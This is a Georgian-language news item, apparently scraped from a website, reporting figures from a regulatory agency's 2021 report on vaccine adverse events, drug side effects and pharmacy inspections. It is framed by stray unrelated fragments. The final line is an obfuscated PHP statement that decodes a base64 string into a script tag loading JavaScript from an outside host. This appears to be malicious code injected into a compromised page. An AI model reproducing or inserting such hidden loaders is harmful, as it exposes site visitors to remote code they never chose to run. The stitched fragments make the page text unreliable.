celsiusi
ავერსი შნაიდერი
სამედიცინო და ფარმაცევტული საქმიანობის რეგულირების სააგენტოს ანგარიშის მიხედვით, რომელიც 2021 წლის 1-ელი იანვრიდან 31 დეკემბრის ჩათვლით პერიოდს მოიცავს, იმუნიზაციის შემდგომ განვითარებული არასასურველი მოვლენების (იშგამ-ების) შესახებ შეტყობინება 2174 შემთხვევაში გაკეთდა.
 
ამასთან, როგორც სამედიცინო და ფარმაცევტული საქმიანობის რეგულირების სააგენტოს 2021 წლის მუშაობის ანგარიშშია ნათქვამი, სამკურნალო საშუალების გვერდითი მოვლენის შესახებ შეტყობინება გაკეთდა 38 შემთხვევაში.
 
„საანგარიშო პერიოდში, განხორციელდა ფარმაცევტული საქმიანობის კონტროლის 708 ღონისძიება, მათ შორის: 663 შემთხვევაში გამოვლინდა სამართალდარღვევის ფაქტები, რაზედაც შედგა ადმინისტრაციული სამართალდარღვევის ოქმები, 45 შემთხვევაში სამართალდარღვევის ფაქტები არ დაფიქსირებულა.“სამკურნალო საშუალებების ხარისხის სახელმწიფო კონტროლის 2021 წლის პროგრამის“ ფარგლებში, საცალო რეალიზაციის რგოლის 84 დაწესებულებაში შესყიდულ იქნა 119 პოზიციის ფარმაცევტული პროდუქტი. შემოწმების შედეგად დადგინდა, რომ 4 დასახელების სამკურნალო საშუალება წარმოადგენდა საქართველოს ბაზარზე დაშვების უფლების არმქონე ფარმაცევტულ პროდუქტს. საანგარიშო პერიოდში, სააგენტოს მიერ გაცემულია 282 საჯარო ინფორმაცია“, - ნათქვამია ანგარიშში.
779
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");